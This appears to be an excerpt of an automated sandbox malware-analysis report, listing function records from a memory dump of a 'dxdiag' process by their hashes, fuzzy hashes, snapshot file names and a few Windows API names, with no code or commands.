                                                                                                                • Instruction ID: 57554b220478db5cbed8bb508ca5b9341bb5a8124f106d97950563f0cb4ed476
                                                                                                                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                • Instruction Fuzzy Hash: FB112933A042D40EC3268D3C8900566BFA31B97234F1D539AF4B59B2D2D6668D8B9359
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a011a27137bedbfde1d81e6990c257233fd33e675cfd29fd3a4a4d1d0f128886
                                                                                                                • Instruction ID: 38d02f156ba9bea008bfc3cbf089b3dc91c799dc872ea954a9214ded2d150559
                                                                                                                • Opcode Fuzzy Hash: a011a27137bedbfde1d81e6990c257233fd33e675cfd29fd3a4a4d1d0f128886
                                                                                                                • Instruction Fuzzy Hash: E301B5F1B0131147D7209E15A4C0B2FB2A96FA0708F58443ED80497382DFB9FC08C6A9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 07a30f681505e4db35b5ed8e54df63b63ef7e515c4b9fc49bbc63e0401b10513
                                                                                                                • Instruction ID: 12b2805a1f20fa8b6142eba5500c80610d2c3edaf282c8c7ce7b4e803315b4ad
                                                                                                                • Opcode Fuzzy Hash: 07a30f681505e4db35b5ed8e54df63b63ef7e515c4b9fc49bbc63e0401b10513
                                                                                                                • Instruction Fuzzy Hash: 45014C293456504BC31A8B39D8E0763BBE2EFE7301F5D85ADC4D28B74AC67ED8064706
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8d66e0010325b6422922c937078ec9626dcdbb334fde7781a2277a78e48d2e8b
                                                                                                                • Instruction ID: 8711fe80fd9cdcc946cfeee52c3a971414c24b006f2a8bfd417734f7af7e8c33
                                                                                                                • Opcode Fuzzy Hash: 8d66e0010325b6422922c937078ec9626dcdbb334fde7781a2277a78e48d2e8b
                                                                                                                • Instruction Fuzzy Hash: BA0149746142048BE724CB249C21BBBBBD1FB8F304F151A2DE1C5A3191CF64D880C60D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8fe6f0fb5443b9a01c1fbd4e09ae81bf7540544174fd81e1490294d2a34f9ea0
                                                                                                                • Instruction ID: 0c7f04cba0ebecf99243f2c815fb382dab3cd3855d7a05e12ca6b616032a23fd
                                                                                                                • Opcode Fuzzy Hash: 8fe6f0fb5443b9a01c1fbd4e09ae81bf7540544174fd81e1490294d2a34f9ea0
                                                                                                                • Instruction Fuzzy Hash: F6C012BAD8002063C3298A1088601F8A2300686428B0BA328CC5A33B60C1299C4284E8
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 4116985748-3916222277
                                                                                                                • Opcode ID: 1a07bbeef6fc36448364366884fe18d673ec2a3ba7b128be2150e116853cae2f
                                                                                                                • Instruction ID: c462c863d7540d378f15546e975ceae7bdcd2c3f8effd4f67c5b55e1d1f3667c
                                                                                                                • Opcode Fuzzy Hash: 1a07bbeef6fc36448364366884fe18d673ec2a3ba7b128be2150e116853cae2f
                                                                                                                • Instruction Fuzzy Hash: 7A3183B09143148FDB40EF69D98965EBBF4BB88304F01853DE499DB364D774A948CF86
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1707898650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_400000_dxdiag.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID: Wu
                                                                                                                • API String ID: 3664257935-4083010176
                                                                                                                • Opcode ID: f6b9515368add2d154cce34743dfe1eab3236b69c5cd9e8125fcbaf6a12fe06c
                                                                                                                • Instruction ID: 336dde16cfeb40de3b2ef609bf2c051ccccdb53c03003955ec431401e460c0aa
                                                                                                                • Opcode Fuzzy Hash: f6b9515368add2d154cce34743dfe1eab3236b69c5cd9e8125fcbaf6a12fe06c
                                                                                                                • Instruction Fuzzy Hash: BEC0027A808400AFCE113FE5FE0A8283E25EB4670670061F4FD4541076DB324936FFA9